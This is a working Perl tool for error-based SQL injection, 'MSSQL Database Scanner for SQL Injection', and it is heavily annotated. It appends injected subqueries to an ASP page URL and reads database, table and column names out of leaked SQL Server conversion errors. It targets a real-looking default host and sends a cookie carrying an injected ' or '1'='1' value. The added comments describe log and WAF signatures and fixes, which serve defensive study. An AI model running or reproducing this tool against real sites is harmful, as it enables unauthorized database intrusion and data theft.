#!/usr/bin/perl
# Error-based SQL injection enumerator for an ASP/MSSQL web page.
#
# How it works (all visible below): every probe is the "normal" URL in $path
# with a URL-encoded "%20and%200<>(select ... );--" clause appended to the
# query string. Each subquery compares a metadata name column against an
# integer (name>1, uid>(str(id))) so that, if the page echoes database
# errors, the server's type-conversion error message carries the name or id
# back in the HTTP response body; findstr() pulls it out of the quoted part
# of that message. Enumeration walks master.dbo.sysdatabases, then
# <db>.dbo.sysobjects (xtype='U'), then <db>.dbo.syscolumns.
#
# Notes for the defending side (all derived from the requests built below):
#   * Access-log / WAF signature: a GET whose query string contains
#     "%20and%200<>(select", "sysdatabases", "sysobjects", "syscolumns" or
#     ends in ";--", sent as HTTP/1.0 with a "HOST:" header that has no
#     space after the colon. The walk is one request per database, table,
#     table id and column, so it produces a burst of near-identical GETs.
#   * The hard-coded Cookie header also carries an injected value in
#     "userinfo" (bw%5Fu=1%27+or+%271%27%3D%271%27%3B%2D%2D decodes to
#     bw_u=1' or '1'='1';--), i.e. cookies are an injection vector too.
#   * What makes this work is (a) string-built SQL on the server and
#     (b) verbose database errors reaching the client. Parameterised
#     queries close (a); generic error pages close the extraction channel
#     in (b); a least-privilege DB login without rights on master.dbo.*
#     metadata limits what (a) alone can enumerate.
#
# Style notes: no "use strict"/"use warnings", so every undeclared name
# ($host, $path, @sqldb, @table_name, @table_id, @columns, $column,
# $db_name, $i, $j, @tb, @tbid ...) is a package global. "my $a,$b;"
# declares only the first variable (comma operator); the rest are globals.
$|=1;
use Socket;
use Getopt::Std;
# Getopt::Std::getopt('hpwtdi'): every listed switch takes an argument and
# is stored in $opt_<letter>. Missing switches fall back to the hard-coded
# defaults below.
getopt('hpwtdi');
$host=$opt_h || "www.vod999.com";
$port=$opt_p || 80;
$path=$opt_w || "/movie_detail.asp?movie_m1id=1264";
$type=$opt_t || "table_scan";
$database=$opt_d;
$tab_id=$opt_i;
#############################################################
# Debug flag: when 1, findstr() dumps every raw HTTP response to STDOUT.
$debug = 0;
# Raw Cookie header sent with every request (note the lower-case "cookie:"
# name and the injected "userinfo" value described in the header comment).
# The session id is whatever was pasted in; it is sent verbatim.
$cookie = "cookie: ASPSESSIONIDCASCBSBQ=JMOEIMPBLNBBGIPICGDIDECN; iscookies=0; BoardList=BoardID=Show; popped=yes; upNum=0; userinfo=bw%5Fu=1%27+or+%271%27%3D%271%27%3B%2D%2D; VisitNum=1";
#############################################################
# The usage banner is printed on every run, not only on bad arguments.
usage();
if($type eq "table_scan") {
    # Phase 1: database names (fills global @sqldb).
    scan_db();
    print "\nDatabase name scan complete!\n===================================\n";
    foreach (@sqldb) {
        print "$_\n";
    }
    print "===================================\n";
    # Phase 2: user tables and their object ids per database
    # (fills global @table_name / @table_id, one "\n"-joined string each).
    scan_table(@sqldb);
    for($i=0;$i<@sqldb;$i++) {
        print "\n\n============== $sqldb[$i] ==============\n\n";
        @tb=split(/\n/,$table_name[$i]);
        @tbid=split(/\n/,$table_id[$i]);
        for($j=0;$j<@tb;$j++) {
            print "| $tb[$j]($tbid[$j])\t";
        }
    }
}
elsif(($type eq "column_scan") && ($database ne "") && ($tab_id ne "")) {
    # column_scan requires both -d and -i; any other combination of
    # arguments silently does nothing after the usage banner.
    scan_columns($database,$tab_id);
    print "\n============== $database.dbo.$tab_id ==============\n\n";
    foreach (@columns) {
        print "| $_\t";
    }
}

# Send one raw HTTP request string to $host:$port and return the response
# as a list of lines (everything the server wrote until it closed the
# connection). Dies on resolution, socket or connect failure.
# Uses the bareword handle S and a hand-packed sockaddr_in ("SnA4x8" with
# family 2 = AF_INET) rather than Socket::sockaddr_in.
sub sendraw {
    my ($req) = @_;
    my $target;
    $target = inet_aton($host) || die("inet_aton problems\n");
    socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n");
    if(connect(S,pack "SnA4x8",2,$port,$target)){
        # select(S) makes the bare print below go to the socket;
        # STDOUT is restored before returning.
        select(S);
        $| = 1;
        print $req;
        my @res = <S>;
        select(STDOUT);
        close(S);
        return @res;
    }
    else {
        die("Can't connect...\n");
    }
}

# Enumerate database names from master.dbo.sysdatabases by walking dbid
# upward from 7 until a probe yields no name. Appends each name to the
# global @sqldb. Starting at 7 skips the lowest ids, presumably the
# built-in system databases — not stated in this file.
# Note: the "()" prototype on this sub is meaningless for arg checking.
sub scan_db() {
    my $i=7;
    my $req,$get;    # only $req is lexical; $get is a global (comma operator)
    my $db=1;
    my @res;
    while($db ne "not found") {
        # "name>1" compares the string column with an integer so the
        # conversion error (if echoed) contains the database name.
        $get=$path."%20and%200<>(select%20count(*)%20from%20master.dbo.sysdatabases%20where%20name>1%20and%20dbid=$i);--";
        $req=make_request($get);
        @res=sendraw($req);
        $db=findstr(@res);
        if($db ne "not found") {
            @sqldb=(@sqldb,$db);
        }
        $i++;
    }
}

# Extract the leaked value from an HTTP response (list of lines).
# Looks for a line matching /char.*int/ (presumably the MSSQL
# "... converting the [n]varchar value '...' to ... int" error text — the
# exact message is not in this file), splits that line on single quotes,
# takes the middle piece, strips spaces, and returns it if it is longer
# than one character. Returns the literal string "not found" otherwise;
# callers compare against that sentinel. Prints "." per matching line as a
# progress indicator. With $debug == 1 the whole response is echoed.
sub findstr {
    my @tmpres=@_;
    my $tmpline;
    my $s1,$s2,$s3;  # only $s1 is lexical; $s2/$s3 are globals
    if($debug == 1) {
        print @tmpres;
    }
    foreach $tmpline (@tmpres) {
        # /g has no useful effect here: the match is evaluated once per line.
        if($tmpline=~/char.*int/isg) {
            $s1=0; $s2=0; $s3=0;
            ($s1,$s2,$s3)=split(/\'/,$tmpline);
            $s2=~s/ //isg;
            print ".";
            if(length($s2) > 1) {
                return $s2;
            }
        }
    }
    return "not found";
}

# For each database name passed in, enumerate user tables (sysobjects
# xtype='U') and each table's object id. Results go into the globals
# @table_name[$i] and @table_id[$i] as "\n"-terminated concatenations,
# indexed in the same order as the input list.
# The first table is fetched with "select top 1 name"; subsequent ones add
# "name not in('t1','t2',...)" built up in $tmpstr1. The id probe uses
# "uid>(str(id))" so the int/varchar conversion error carries the id.
sub scan_table {
    my @db=@_;
    my $req,$get;    # only $req is lexical; $get is a global
    my $table=1;
    my @res;
    my $tmpstr1;
    my $i=0;
    my $tableid;
    # $db_name is not declared with my, so it is a package global.
    foreach $db_name (@db) {
        $tmpstr1="";
        $table=1;
        $get=$path."%20and%200<>(select%20top%201%20name%20from%20$db_name.dbo.sysobjects%20where%20xtype='U');--";
        $req=make_request($get);
        @res=sendraw($req);
        $table=findstr(@res);
        $table_name[$i]=$table_name[$i]."$table\n";
        $get=$path."%20and%200<>(select%20count(*)%20from%20$db_name.dbo.sysobjects%20where%20xtype='U'%20and%20name='$table'%20and%20uid>(str(id)));--";
        $req=make_request($get);
        @res=sendraw($req);
        $tableid=findstr(@res);
        $table_id[$i]=$table_id[$i]."$tableid\n";
        $tmpstr1="'$table'";
        while($table ne "not found") {
            $get=$path."%20and%200<>(select%20top%201%20name%20from%20$db_name.dbo.sysobjects%20where%20xtype='U'%20and%20name%20not%20in($tmpstr1));--";
            $req=make_request($get);
            @res=sendraw($req);
            $table=findstr(@res);
            if($table ne "not found") {
                $table_name[$i]=$table_name[$i]."$table\n";
                $get=$path."%20and%200<>(select%20count(*)%20from%20$db_name.dbo.sysobjects%20where%20xtype='U'%20and%20name='$table'%20and%20uid>(str(id)));--";
                $req=make_request($get);
                @res=sendraw($req);
                $tableid=findstr(@res);
                $table_id[$i]=$table_id[$i]."$tableid\n";
            }
            # Appended unconditionally, so the sentinel "not found" ends up
            # in $tmpstr1 on the final pass (harmless: the loop exits).
            $tmpstr1=$tmpstr1.",'$table'";
        }
        print "\nDatabase \"$db_name\" scan complete!\n";
        $i++;
    }
}

# Enumerate column names of one table, identified by database name and
# sysobjects id (the value table_scan prints in parentheses), by walking
# <db>.dbo.syscolumns with a growing "name not in(...)" exclusion list.
# Appends to the global @columns; $column is also a global. The first
# result is pushed even when it is the "not found" sentinel.
sub scan_columns {
    my $this_db_name=shift;
    my $this_table_id=shift;
    my $get,$req,$tmpstr;    # only $get is lexical; $req/$tmpstr are globals
    my @res;
    $get=$path."%20and%200<>(select%20top%201%20name%20from%20$this_db_name.dbo.syscolumns%20where%20id=$this_table_id);--";
    $req=make_request($get);
    @res=sendraw($req);
    $column=findstr(@res);
    @columns=(@columns,$column);
    $tmpstr="'$column'";
    while($column ne "not found") {
        $get=$path."%20and%200<>(select%20top%201%20name%20from%20$this_db_name.dbo.syscolumns%20where%20id=$this_table_id%20and%20name%20not%20in($tmpstr));--";
        $req=make_request($get);
        @res=sendraw($req);
        $column=findstr(@res);
        if($column ne "not found") {
            @columns=(@columns,$column);
            $tmpstr=$tmpstr.",'$column'";
        }
    }
}

# Build the raw HTTP/1.0 GET for a request-target string. The request is
# exactly three header lines: the request line, "HOST:$host" (no space after
# the colon) and the global $cookie, then the blank line. No User-Agent or
# other headers, which is itself a distinguishing trait in server logs.
sub make_request {
    my $getstr=shift;
    my $reqstr;
    $reqstr="GET $getstr HTTP/1.0\r\n". "HOST:$host\r\n". $cookie."\r\n\r\n";
    return $reqstr;
}

# Print the usage banner to STDOUT. Called unconditionally at start-up.
sub usage {
    print qq~
===================================================
MSSQL Database Scanner for SQL Injection
Codz By Envymask
===================================================
Usage: $0 -h <Host> [-p <port>] -w <normal URL> -t <scan type> [-d <database name> -i <table id>]
-h =hostname you want to scan
-p =port,80 default
-w =the normal URL you request such as "/movie_detail.asp?movie_m1id=1264"
-t =scan type ,only accept "table_scan" and "column_scan"
-d =the database name you want to scan such as "movie",only selected "column_scan" can use this option
-i =the table id you want to scan such as "1568724641",you can get this id from table_scan,only selected "column_scan" can use this option
Eg:
$0 -h www.target.com -p 80 -w "/movie_detail.asp?movie_m1id=1264" -t table_scan
$0 -h www.target.com -p 80 -w "/movie_detail.asp?movie_m1id=1264" -t column_scan -d movie -i 1568724641
~;
}